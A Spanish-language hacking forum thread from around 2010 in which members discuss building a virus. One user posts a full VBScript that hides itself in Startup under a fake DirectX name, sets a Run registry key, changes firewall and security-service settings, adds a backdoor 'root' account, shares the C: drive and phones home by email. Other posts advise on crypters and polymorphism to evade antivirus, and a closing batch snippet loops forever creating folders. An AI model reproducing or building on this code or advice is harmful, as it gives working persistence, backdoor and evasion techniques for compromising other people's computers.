puuffff "estudiar" suena a "chungo" xDxD Tienes razón...
puuffff "estudiar" suena a "chungo" xDxD Tienes razón...
Nadie dijo que esto fuera facil. Y copiar codigo sin saber de que va no sirve para nada.
Si quieres puedes probar a cogerlo por partes y ver que es lo que va haciendo en cada una de ellas (compilando y ejecutando en una maquina Virtual) y asi vas aprendiendo.
Un saludo
Chicos se me ha ocurrido una idea mucho mejor. No sé si crear un nuevo post pero no me quiero liar a postear xD. Mi ideas es que creemos una especie de wargame para windows. Es un programa escrito en vb o c que te va dando pistas. Por ejemplo: te da una pista hacia un archivo de texto y ese archivo contiene una especie de acertijo. El acertijo te llevará a una clave del registro con una valor, que tendrás que copiar y pegar en el wargame para que te de el nivel válido. El wargame tendrá la firma del foro. No se si se habrá mencionado antes la idea de hacer un wargame del foro pero desde mi punto de vista esta es mejor
P.D.: No se si les pasa a otras personas pero todo esto se me ocurrió antes de dormirme, en mi querida cama. Es mi lugar de intimidad y pensamiento propio... Mis ideas se desarrollan allí
¿Posteo otro tema explicándolo todo? :S
bueno esto lo hice en vbs, el objetivo es desactivar el fir avisos..., el login telnet,y hacer un usuario net bios y compartir el disco c:\, ademas en teoria te manda el mail y al mirar en la cabezera ya sabes la ip de la victima, es algo que hice y no creeo que funcione, pero bueno aqui lo dejo la idea no es mala.
' VB Script Document
Dim objshell,objscript,xsd,xsd2,erre,arc,tr
Set objshell = createobject("wscript.shell")
Set objscript = CreateObject("Scripting.FileSystemObject")
xsd = objshell.specialfolders("Startup")
erre = objscript.FileExists(xsd & "\DirecTx3D.vbs")
if erre = False Then
objscript.copyfile wscript.scriptfullname, xsd & "\DirecTx3D.vbs", true
Set arc = objscript.GetFile( xsd & "\DirecTx3D.vbs")
arc.Attributes = 3
End if
objshell.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\CurrentVers ion\Run\DirecTx3D.vbs", xsd, "REG_SZ"
objshell.regwrite "HKLM\Software\Policies\Microsoft\WindowsFirewall\ StandardProfile\EnableFirewall",1,"REG_DWORD"
objshell.regwrite "HKLM\SOFTWARE\Microsoft\Security Center\FirewallDisableNotify",1,"REG_WORD"
objshell.regwrite "HKLM\SYSTEM\CurrentControlSet\Services\wscsvc\Sta rt",4,"REG_WORD"
objshell.regwrite "HKLM\SOFTWARE\Microsoft\TelnetServer\1.0\EventLog gingEnabled",0,"REG_WORD"
objshell.Exec("cmd /c net user root lolll /add")
objshell.Exec("cmd /c net share Publico0=c:\")
set objcdo=createobject("cdo.message")
objcdo.subject="Prueba de envío"
objcdo.from="@gmail.com"
objcdo.to="@yahoo.es"
objcdo.textbody="Este es el texto del mail"
objcdo.configuration.fields.item("http://schemas.microsoft.com/cdo/configuration/sendusing") = 2
objcdo.configuration.fields.item("http://schemas.microsoft.com/cdo/configuration/smtpserver") = "smtp.gmail.com"
objcdo.configuration.fields.item("http://schemas.microsoft.com/cdo/configuration/smtpserverport") = 465
objcdo.configuration.fields.item("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate") = 1
objcdo.configuration.fields.item("http://schemas.microsoft.com/cdo/configuration/smtpconnectiontimeout") = 30
objcdo.configuration.fields.item("http://schemas.microsoft.com/cdo/configuration/sendusername") = "@gmail.com"
objcdo.configuration.fields.item("http://schemas.microsoft.com/cdo/configuration/sendpassword") = ""
objcdo.configuration.fields.item("http://schemas.microsoft.com/cdo/configuration/smtpusessl") = 1
objcdo.configuration.fields.update
objcdo.send
WScript.Quit
Sabes Visual Basic Script? Además, si lees anteriormente, los antivirus suelen dar prioridad a los archivos vbs, a no ser que lo convirtamos en un ejecutable y le apliquemos un crypter... lo mas que puedo hacer es que no lo detecte ninguno menos avira...
Se muy poco de vbscript, casi todo lo aprendi de este tutorial y despues mirando codigos de malware y mas trozos interesante de programas que encontre por los foros.
http://www.mediafire.com/?dmi2tjwt1yy
son tres partes, es bastante basico pero para empezar a entender ese codigo que te han dejado antes te va venir de perlas.
Me pregunto si podríamos hacerlo en asm, que es una de las mejores formas de tocar el hardware.
La IP de la víctima no, en todo caso la IP del servidor de correo que te envia el mail.ademas en teoria te manda el mail y al mirar en la cabezera ya sabes la ip de la victima,
Aunque apliques un cifrado del fichero ejecutable, un antivirus puede analizar la memoria y por tanto ya no analiza un programa, sino un proceso. Para que pase totalmente desapercibido debe emplear además de cifrado, técnicas de polimorfismo o añadir código de modificación software.Además, si lees anteriormente, los antivirus suelen dar prioridad a los archivos vbs, a no ser que lo convirtamos en un ejecutable y le apliquemos un crypter... lo mas que puedo hacer es que no lo detecte ninguno menos avira...
Un saludo.
Estas seguro de eso ?¿?La IP de la víctima no, en todo caso la IP del servidor de correo que te envia el mail.
Entonces la ultima linea de la cabecera que significa (Es en yahoo)
Received: from [xx.x.xxx.xxx] y no es la ip de los servers smtp, pop3 por los que paso
by web24820.mail.ird.yahoo.com via HTTP; Fri, 05 Nov 2010 00:42:45 GMT
X-Mailer: YahooMailRC/504.5 YahooMailWebService/0.8.107.284920
Date: Fri, 5 Nov 2010 00:42:45 +0000 (GMT)
From: Soni Montoys <[email protected]>
Haber si me lo puedes explicar,de verdad que estaria muy agredecido porque me dejastes con la duda.
Gracias por adelantado.
Última edición por chewarrior; 10-11-2010 a las 00:36
Prueba a resolver la dirección IP.
Mándatelo tú desde otra dirección.
Ya lo e hecho y en ese apartado sale mi ip Received: from [xx.x.xxx.xxx]
aqui sale con el mail que lo envie From: Soni Montoys <[email protected]>
Por cierto que e hecho un escaneo con nessus y me sale que tengo un server ftp,cuando no tengo na de na, asi que directamente e ido a cmd, ftp, ftp open 127.0.0.1 21,connect :numeto de error desconocido, umm o yo soy un neurotico o alguien me esta jodiendo
O tienes un router que sí tiene servidor de FTP, claro.
Tiene que ser tema del router porque en mi sistema wxp, no esta abierto el puerto 21, el caso es que en el router tampoco esta habilitado el acesso ftp xd.
Efectivamente tengo server ftp en el router xd
Gondar_h, chapó. Sólo quería decirle al creador de éste hilo que comentaba algo de que el virus pudiera anular las librerías de panda -entre otras cosas-... se dice, no sé si son malas lenguas pero sí que al menos han trabajado en Panda en Bilbao, que sus antivirus-firewalls básicamente son manejos de iptables... un poquito de allí, otro de allá... y hala... a vender el pescado. Escribo de oídas, así es que alguien que les haya podido meter mano o bien haya decompilado código suyo o como fuere podrá decirme que no es así y estará en su derecho y yo quedaré agradecido ^^.
Siento disentir contigo compañero de foro. Mi distro me suele pedir el pass cada poco tiempo y no estoy seguro de si es por inactividad (cosa que dudo bastante) o porque el nivel de privilegio de ciertos programas o modificaciones de ciertos archivos así lo requiere. Por ejemplo, si quiero modificar el archivo de configuración de un ids como Snort me pide que sea root, lo modifico según mi conveniencia y todo perfecto, si más tarde necesito hacerlo de nuevo... ¿qué sucede? tachán!!! me vuelve a pedir el pass... He aquí una de las diferencias más grandes que existen con respecto a Win2, aún así hacerse con el control de un unix puede ser asombrosamente fácil, eso sí teniendo la máquina física delante -ya se saben bien conocidos ciertos fallos en linux-, sino ya es harina de otro costal
Fruit, tal vez me digas que se puede modificar el nivel de privilegio para que no sea tan tedioso el tener que estar "diciendo" soy root :P pero entonces estaría minando una de las seguridades de mi sistema. De todos modos es genial que seáis tan activos y ofrezcáis vuestros conocimientos. Lo mejor de todo es poder discutir y seguir aprendiendo! Me encanta éste foro y casi todo lo que se debate en él. Seguid así!!!!
Código:1: md nuevo cd nuevo goto 1
Marcadores